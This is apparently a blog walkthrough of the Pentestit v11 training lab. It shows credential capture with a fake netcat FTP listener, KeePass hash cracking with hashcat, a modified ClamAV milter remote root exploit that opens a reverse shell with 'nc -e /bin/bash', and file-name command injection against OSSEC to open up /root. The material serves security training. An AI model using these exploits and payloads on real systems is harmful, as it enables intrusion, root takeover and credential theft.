Innogen security

RECENT BLOG

Posted in Blog post

Pentestit lab v11 Guide Part 7

 

Site 1 Admin Network:

Testing the aengineer ssh key against 192.168.10.1 proved successful and we can enumerate the host:

 

CONNECT – 192.168.11.1:

Bash history:

aengineer@tl11-192-168-10-1:~$ ls -al
total 28
drwxr-xr-x 3 aengineer aengineer 4096 Jul 12 14:50 .
drwxr-xr-x 4 root      root      4096 Jul 12 14:45 ..
-rw------- 1 aengineer aengineer 1256 Jul 12 16:53 .bash_history
-rw-r--r-- 1 aengineer aengineer  220 Jul 12 14:45 .bash_logout
-rw-r--r-- 1 aengineer aengineer 3515 Jul 12 14:45 .bashrc
-rw-r--r-- 1 aengineer aengineer  675 Jul 12 14:45 .profile
drwxr-xr-x 2 root      root      4096 Jul 12 14:50 .ssh
aengineer@tl11-192-168-10-1:~$ cat .bash
cat: .bash: No such file or directory
aengineer@tl11-192-168-10-1:~$ cat .bash_history 
cd
tcpdump
/usr/sbin/tcpdump
/usr/sbin/tcpdump --help
/usr/sbin/tcpdump -i eth0 -c 2
which gcc
which ruby
ruby -v
exit
cd /dev/shm/
wget 192.168.11.3/admin
env
set http_proxy=""
wget 192.168.11.3/admin
export http_proxy=""
wget 192.168.11.3/admin
wget 192.168.11.3/_admin/admin
wget 192.168.11.3/_admin/admin/
ruby -v 
ncat -klvp 7777
ncat -klvp 8888
ncat -klvp 9999
cd
exit
cd /dev/shm
ls
perl ngxbrt.pl 
perl ngxbrt.pl 192.168.11.3 80 192.168.10.1 8888
exit
ncat -klvp 8888
exit
cd /dev/shm
perl ngxbrt.pl 192.168.11.3 80 192.168.10.1 8888	Does not exist..
exit
cd /tmp
ls -la
cat ~/.bash_history 
clear
nc -nvlp 2020
/usr/sbin/tcpdump -i eth0 -A '' -w /var/tmp/dump.pcap
ls
exit
ls -la
nc -nvvlp 1234
exit
nmap -v -n -p- 192.168.10.2 -sV
nmap -v -n -p- 192.168.10.2 -sV -Pn
nmap -v -n -p- 192.168.10.2 -sV -Pn -T4
/usr/sbin/tcpdump 'src 192.168.10.2'
/usr/sbin/tcpdump 'src 192.168.10.2 || dst 192.168.10.2'
/usr/sbin/tcpdump 'src 192.168.10.5 || dst 192.168.10.5'
telnet 192.168.11.5
telnet 192.168.11.5 25
nc -nvlp 2020 here twice… will test this and leave for 10 mins..
sudo -l
ncat -klvp 8888
cd /dev/shm
cat ngxbrt.pl | nc 172.16.0.16 10100
ncat -klvp 8888
sudo -l
sudo tcpdump -A -i eth0 -s 1500 -c 1000 port not 22 and host not \
192.168.11.1 and port not 53 and host not 92.168.56.2 \
and not arp and port not 123
ls
aengineer@tl11-192-168-10-1:~$

Based on the bash history the following items are of interest:

  • /dev/shm/ngxbrt.pl – Checking this shows the file no longer exists.
  • /usr/sbin/tcpdump -i eth0 -A ” -w /var/tmp/dump.pcap: a pcap of the network is available in /var/tmp so we can review this.
  • nc -nvlp 2020: Appears twice so i check my notes and find 2020 appears in the todo.txt we found on the Director machine:
    # m h  dom mon dow   comman1
    */3 * * * * su - checker -c 'python /home/checker/ftpclient.py 192.168.10.1 2020 5 user password' > /dev/null 2>&1
    

So this is noteworthy for potential use.

Grabbing the pcap:

As we found the pcap in the /var/tmp directory we can use scp to pull the file down and view in wireshark:

scp -i adminnet.key aengineer@192.168.10.1:/var/tmp/dump.pcap dump.pcap

Again we navigate the pcap looking for ftp/http or other connections that will potentially contain information or cleartext passwords and eventually after a lot of noise in the pcap we find a login request to 192.168.10.3:

We save this information off for later use.

Next item in the bash_history is the repeated netcat listener on port 2020 and the associated ftp command found in the todo.txt on the director machine:

NC -NLVP 2020:

We fire up netcat on port 2020 and leave it running, remember the crontab states this will execute every three minutes: */3 * * * *
Eventually a hit is received which times out and we note our reference to the todo.txt script stating this is an ftp request which is supplying the username and password via the script.

 

aengineer@tl11-192-168-10-1:~$ nc -nvlp 2020
listening on [any] 2020 ...
connect to [192.168.10.1] from (UNKNOWN) [192.168.11.4] 8224

 

Based on this i try a number of ways to grab the details from the connection request and fail using echo commands:

NOTE: The following wiki was useful for this exercise:

https://en.wikipedia.org/wiki/List_of_FTP_server_return_codes

220

Service ready for new user.

331

User name okay, need password.

Failed Echo command:

aengineer@tl11-192-168-10-1:~$ echo "220 Welcome to Pwny FTP Service\n331 SPECIFY THE PASSWORD\r\n"|nc -nlvp 2020
listening on [any] 2020 ...
connect to [192.168.10.1] from (UNKNOWN) [192.168.11.4] 8228
USER ConnectToken

aengineer@tl11-192-168-10-1:~$ echo "220 Welcome to Pwny FTP Service\r\n331 SPECIFY THE PASSWORD"|nc -nlvp 2020
listening on [any] 2020 ...

aengineer@tl11-192-168-10-1:~$
aengineer@tl11-192-168-10-1:~$

As you can see I can grab the username but the password response does not work so i look at options and use printf as a further test which produces the results required:

printf:

aengineer@tl11-192-168-10-1:~$ printf "220 Welcome to Pwny FTP Service\n331 SPECIFY THE PASSWORD\n"|nc -nlvp 2020
listening on [any] 2020 ...
connect to [192.168.10.1] from (UNKNOWN) [192.168.11.4] 1758
USER ConnectToken
PASS *************
aengineer@tl11-192-168-10-1:~$

As a further exercise i decide to test the same with python print:

aengineer@tl11-192-168-10-1:~$ python -c 'print "220 Welcome to Pwny FTP Service\r\n331SPECIFY THE PASSWORD"' | nc -nlvp 2020
listening on [any] 2020 ...
connect to [192.168.10.1] from (UNKNOWN) [192.168.11.4] 8241
USER ConnectToken
PASS *************
aengineer@tl11-192-168-10-1:~$

We now have the CONNECT token and move on to the next hosts.

 

OWNCLOUD – 192.168.10.3:

As we have the credentials for 10.3 taken from the pcap file we connect to the open port 80 based on the pcap and login to a document storage site:

We quickly see a my_store.kdbx file and checking this extension in google shows this as a keepass database file.I downloaded my_store and it appears kali has a built in tool just for this occasion.
The following link helped: https://www.rubydevices.com.au/blog/how-to-hack-keepass

keepass2john my_store.kdbx 
my_store:$keepass$*2*100000*222*
248fc218b7a47edeecd7a79e8587d5ff2c2221d98efd99837fe198ab0de8a82e*
330c91f974cb4df1d015bb15456d382db9c0c2f362909d5cd74f9b951fdee2f7*
828fb21b74cda7ae28a21473aaa62384*
f974657de86a3aca6faec09804d852a4df5fba5847e54d18e12bd81c33cce528*
7ca22042949d204e2f35aae52982946c101679205aa8db0ece2135cdb574170c

Taking this hash i fire it into hashcat and gain the OWNCLOUD keepass password:

Hashcat: hashcat -m 13400 -a 0 -w 2 keepass.txt rockyou.txt 

We now have the password to unlock the keepass file which I then upload to the following site: https://app.keeweb.info/
which then produces the required TOKEN.

 

CLAMAV – 192.168.11.5:

When enumerating this host we find ssh and port 25 smtp open:

 

Nmap scan report for 192.168.11.5
Host is up (0.0019s latency).
Not shown: 998 filtered ports
PORT   STATE SERVICE
22/tcp open  ssh
25/tcp open  smtp

checking port 25 returns the following:

tl11-192-168-11-5.mail-dev ESMTP Sendmail 8.14.4/8.14.4/Debian-8+deb8u2

After connecting to the smtp port a few times it was noticed there is a delay returning the welcome message also I was confident on how this is to be exploited, as its exactly the same as a machine I worked on in regards to ports open and versions I dealt with during my OSCP which was exploited using the clamav milter exploit:
https://www.exploit-db.com/exploits/4761/

Due to the delay found above “Exploit 4761” needs to be edited before being used to allow for the delay, so I merely added a sleep of 10 seconds to allow for the delay prior to execution of the exploit and commented out the unrequired rcpt to lines:

### black-hole.pl
### Sendmail w/ clamav-milter Remote Root Exploit
### Copyright (c) 2007 Eliteboy
########################################################
use IO::Socket;

print "Sendmail w/ clamav-milter Remote Root Exploit\n";
print "Copyright (C) 2007 Eliteboy\n";

if ($#ARGV != 0) {print "Give me a host to connect.\n";exit;}

print "Attacking $ARGV[0]...\n";

$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                              PeerPort => '25',
                              Proto    => 'tcp');

# SBridgens added this in to ensure correct response from the host!
print "sleeping 10 seconds to allow response";
sleep(10);

print $sock "ehlo you\r\n";
print $sock "mail from: <>\r\n";
print $sock "rcpt to: <nobody+\"|/bin/nc -e /bin/bash 192.168.10.1 8443\"@localhost>\r\n";
# print $sock "rcpt to: <nobody+\"|echo '31337 stream tcp nowait root /bin/sh -i' >> /etc/inetd.conf\"@localhost>\r\n";
# print $sock "rcpt to: <nobody+\"|/etc/init.d/inetd restart\"@localhost>\r\n";
print $sock "data\r\n.\r\nquit\r\n";

while (<$sock>) {
        print;
}

# milw0rm.com [2007-12-21]

Connecting to our admin network machine as aengineer (10.1) we start our nc listener and fire off the clam av milter exploit and immediate success is returned:

Now we have a shell we begin to enumerate the host, linux privilege check is uploaded and executed to speed up this process; after reading this multiple time I eventually question the following lines which shows user accounts and processes running:

 

[*] ENUMERATING USER AND ENVIRONMENTAL INFO...
[+] All users
ossec:x:1001:1001::/var/ossec:/bin/false
ossecm:x:1002:1001::/var/ossec:/bin/false
ossecr:x:1003:1001::/var/ossec:/bin/false

[+] Current processes

ossec 578 12:14 0:00 /var/ossec/bin/ossec-analysisd
ossec 596 12:14 0:00 /var/ossec/bin/ossec-monitord

[*] IDENTIFYING PROCESSES AND PACKAGES RUNNING AS ROOT OR OTHER SUPERUSER..
root 588 12:14 0:00 /var/ossec/bin/ossec-logcollector
root 591 12:14 0:00 /var/ossec/bin/ossec-syscheckd

Investigating the user accounts found a check in google shows
https://en.wikipedia.org/wiki/OSSEC

Looking at exploits for OSSEC returns the following exploit-db post:

https://www.exploit-db.com/exploits/37265/

This exploit took me a moment or two to actually get the point which was very clear in the description (facepalm)

Above, on line 258, the system() call is used to shell out to the
system’s “diff” command. The raw filename is passed in as an argument
which presents an attacker with the possibility to run arbitrary code.

Based on many exploits we know in some cases for linux we can present a filename with a system command and get the output or even a shell, as we need to read the token file held in the /root directory we will create files in order to change the permissions of the root directory and then read the token file within.
NOTE:  This one took quite some time to get right as the diff process runs periodically I tried things such as cat commands etc but failed to get the output so chmod seemed to be the best way forward.

 

touch "a-\$(chmod 777 root)"
touch "b-\$(chmod 777 root)"
touch "c-\$(chmod 777 root)"
/bin/sleep 3
echo "give me the token" > a-*
/bin/sleep 3
echo "give me the token nooow" > b-*
/bin/sleep 3
echo "One more for good luck" > c-*
ls -al /root

 

 

clamav@tl11-192-168-11-5:~$ ls -al /root
ls -al /root
ls: cannot open directory /root: Permission denied
clamav@tl11-192-168-11-5:~$ touch "a-\$(chmod 777 root)"
touch "b-\$(chmod 777 root)"
touch "c-\$(chmod 777 root)"
/bin/sleep 3
echo "give me the token" > a-*
/bin/sleep 3
echo "give me the token nooow" > b-*
/bin/sleep 3
echo "One more for good luck" > c-*
ls -al /roottouch "a-\$(chmod 777 root)"
clamav@tl11-192-168-11-5:~$ touch "b-\$(chmod 777 root)"
clamav@tl11-192-168-11-5:~$ touch "c-\$(chmod 777 root)"
clamav@tl11-192-168-11-5:~$ /bin/sleep 3
clamav@tl11-192-168-11-5:~$ echo "give me the token" > a-*
clamav@tl11-192-168-11-5:~$ /bin/sleep 3
clamav@tl11-192-168-11-5:~$ echo "give me the token nooow" > b-*
clamav@tl11-192-168-11-5:~$ /bin/sleep 3
clamav@tl11-192-168-11-5:~$ echo "One more for good luck" > c-*
clamav@tl11-192-168-11-5:~$ 
ls -al /root
total 80
drwxrwxrwx  5 root root  4096 Jul 12 16:39 .
drwxr-xr-x 22 root root  4096 Apr  1 22:18 ..
drwx------  2 root root  4096 Nov 25  2016 .aptitude
-rw-------  1 root root  7559 Jul 12 16:40 .bash_history
-rw-r--r--  1 root root   674 Sep  3  2016 .bashrc
drwx------  3 root root  4096 May  1  2015 .config
-rw-------  1 root root    51 Apr 20 21:44 .lesshst
-rw-------  1 root root   407 Jul  4 21:36 .nano_history
-rw-r--r--  1 root root   140 Nov 19  2007 .profile
-rw-------  1 root root  1024 Apr 20 22:17 .rnd
-rw-r--r--  1 root root    66 Apr 21 12:56 .selected_editor
drwxr-xr-x  2 root root  4096 Jul 12 16:39 .ssh
-rw-------  1 root root 11611 Jul 12 16:39 .viminfo
-rwxr-xr-x  1 root root    38 Nov  5  2014 ipt.sh
-rwx------  1 root root   665 Jun 24 11:40 process_checker_mail.sh
-rwx------  1 root root   459 Apr 21 12:55 process_checker_ossec.sh
-rw-r--r--  1 root root    23 Jun 30 18:08 token
clamav@tl11-192-168-11-5:~$ 
clamav@tl11-192-168-11-5:~$ cat /root/token
cat /root/token
A**********************
clamav@tl11-192-168-11-5:~$

clamav@tl11-192-168-11-5:~$

Now for the final system: access control…

PART 8

Innogen security

RECENT BLOG

Exploiting Sudo 1.8.27 The following brief is a quick demonstration of the issue faced by cve-2019-14287. This issue is presented when the user is allowed to run a specified command as any user other than the root user account, specified …

17 Oct 2019

SMB LFI Exploitation The following outlines a very short overview of LFI using SMB in form of a crib sheet. Install Samba: apt-get install samba Remove default Samba config: rm -f /etc/samba/smb.conf Create New smb.conf: vi /etc/samba/smb.conf The following config …

13 Oct 2019

Linux reverse shell without python. During a recent application exploit into an interactive shell the typical path to spawn a reverse shell and upgrade it to tty was sought. It was found that the go to technologies such as python, …

19 Sep 2019